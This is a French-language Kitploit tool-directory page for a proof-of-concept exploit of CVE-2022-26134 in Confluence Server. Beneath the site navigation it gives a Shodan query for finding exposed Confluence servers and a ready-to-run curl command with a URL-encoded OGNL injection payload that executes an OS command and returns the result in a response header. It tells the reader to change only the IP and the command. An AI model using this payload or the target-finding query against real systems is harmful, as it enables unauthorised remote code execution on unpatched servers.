Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Confluence-CVE-2022-26134 — Exploit de preuve de concept pour CVE-2022-26134 dans Confluence Server, utilisant l'injection OGNL pour exécuter des commandes via des requêtes HTTP forgées. | Kitploit
Outils/GitHubGitHub/y000o/confluence-cve-2022-26134
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et Contrôle
GitHuby000o/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Exploit de preuve de concept pour CVE-2022-26134 dans Confluence Server, utilisant l'injection OGNL pour exécuter des commandes via des requêtes HTTP forgées.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
422il y a 4 ansPas encore vérifié

Confluence-CVE-2022-26134

dork sur shodan

root@kitploit:~
https://www.shodan.io/search?query=http.favicon.hash%3A-305179312&page=2

PoC curl

root@kitploit:~
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Vous avez juste besoin de modifier l'IP et la commande.

Télécharger l’outil